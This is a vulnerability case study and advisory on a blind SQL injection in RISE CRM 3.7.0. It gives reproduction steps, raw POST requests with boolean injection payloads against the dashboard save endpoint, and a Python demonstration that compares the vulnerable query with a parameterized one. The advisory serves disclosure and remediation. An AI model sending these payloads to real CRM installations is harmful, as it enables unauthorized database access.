Bytium • Insight

Blind SQL Injection in RISE CRM (CVE-2024-8945)

Case study detailing the discovery, validation, and remediation of a blind SQL injection vulnerability in RISE CRM version 3.7.0.

By Bytium Operators

Background

At Bytium, security validation is a standard step before recommending third-party software to clients. When a client considered adopting RISE CRM for customer and project management, we performed a security assessment to evaluate potential risks prior to deployment.

This case study documents the identification of a critical SQL injection vulnerability, our coordination with the vendor, and the resulting remediation.

Vulnerability Summary

Affected version: 3.7.0
Patched version: 3.7.1
CVE: CVE-2024-8945

A blind SQL injection vulnerability was identified that allows authenticated users to manipulate backend database queries through unsanitized input.

Technical Details

Vulnerability type: Blind SQL Injection
Severity: Critical

Vulnerable endpoint: /index.php/dashboard/save
Vulnerable parameter: id

Root cause:

$id = $this->request->getPost("id");

User input from a POST request is assigned directly to a variable without validation or sanitization, allowing crafted SQL payloads to influence backend queries.
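To make the root cause concrete, the following is an added Python model of the flawed pattern beside a hardened version. It is not RISE CRM's code (the application is PHP); the dashboards table, its rows, and the lookup query are constructed assumptions. It runs the page's two payloads through both handlers: against the string-interpolated query they yield different results (the boolean differential that the 200 vs. 302 responses revealed), while the hardened handler rejects both before any SQL executes and still finds a legitimate numeric id.

```python
import re
import sqlite3

# Constructed sample rows standing in for a CRM's dashboards table (not RISE CRM's schema).
SAMPLE_DASHBOARDS = [(1, 7, "Sales"), (2, 7, "Support"), (3, 9, "Finance")]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE dashboards (id INTEGER PRIMARY KEY, user_id INTEGER, title TEXT)"
    )
    conn.executemany("INSERT INTO dashboards VALUES (?, ?, ?)", SAMPLE_DASHBOARDS)
    return conn


def vulnerable_lookup(conn, raw_id):
    """Models the flawed pattern: the POSTed id is spliced into the SQL text unchanged.

    A payload can therefore rewrite the WHERE clause; '-1 OR 1=1' matches every row,
    '-1 OR 1=2' matches none, and the caller observes the difference.
    """
    sql = f"SELECT COUNT(*) FROM dashboards WHERE id = {raw_id}"
    try:
        return conn.execute(sql).fetchone()[0] > 0
    except sqlite3.Error:
        # A syntactically broken payload simply looks like "not found".
        return False


# A dashboard id is a positive decimal integer; anything else is rejected outright.
ID_PATTERN = re.compile(r"[1-9][0-9]*")


def validate_id(raw_id):
    """Return the id as an int, or None when the input is not a positive integer string."""
    if not isinstance(raw_id, str) or ID_PATTERN.fullmatch(raw_id) is None:
        return None
    return int(raw_id)


def hardened_lookup(conn, raw_id):
    """Validate the id, then bind it as a query parameter so the SQL structure is fixed."""
    dashboard_id = validate_id(raw_id)
    if dashboard_id is None:
        return False
    row = conn.execute(
        "SELECT COUNT(*) FROM dashboards WHERE id = ?", (dashboard_id,)
    ).fetchone()
    return row[0] > 0


def compare(raw_id):
    """Run one id value through both handlers against a fresh sample database."""
    conn = make_db()
    try:
        return {
            "vulnerable": vulnerable_lookup(conn, raw_id),
            "hardened": hardened_lookup(conn, raw_id),
        }
    finally:
        conn.close()


if __name__ == "__main__":
    # The two payloads from the case study plus a legitimate id and a non-existent one.
    for value in ("-1 OR 1=1-- -", "-1 OR 1=2-- -", "2", "99"):
        print(repr(value), compare(value))
```

The hardened handler applies both controls the patch needs: the type check stops non-numeric input at the boundary, and parameter binding means that even a value which slips past validation cannot change the query's structure. Either control alone closes this specific case; together they also cover future call sites that forget one of them.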

Reproduction Steps

  1. Log in to RISE CRM version 3.7.0.
  2. Create a new dashboard.
  3. Intercept the POST request using an intercepting proxy.
  4. Modify the id parameter with the following payloads:
    • Failed payload: -1 OR 1=2-- -
    • Successful payload: -1 OR 1=1-- -
  5. Observe response differences confirming blind SQL injection.

Proof of Exploitation

Successful request:

POST /rise/index.php/dashboard/save HTTP/1.1
id=-1 OR 1=1-- -&data=false&title=SQLI&color=#34495e

Response:

HTTP/1.1 200 OK
{"success":true,"dashboard_id":"-1 OR 1=1-- -","message":"The record has been saved."}

Failed request:

POST /rise/index.php/dashboard/save HTTP/1.1
id=-1 OR 1=2-- -&data=false&title=SQLI&color=#34495e

Response:

HTTP/1.1 302 Found

The response discrepancy confirms blind SQL injection behavior.

Mitigation

The vendor was notified immediately after validation. A patched version (3.7.1) was released following coordination with the development team.

Users should upgrade to version 3.7.1 or later.

Disclosure Timeline

September 3, 2024 – Initial discovery
September 3, 2024 – Vendor notified
September 4, 2024 – Vendor response
September 9, 2024 – Patch released
September 12, 2024 – Public disclosure

Acknowledgment

This vulnerability was discovered by Jobyer Ahmed.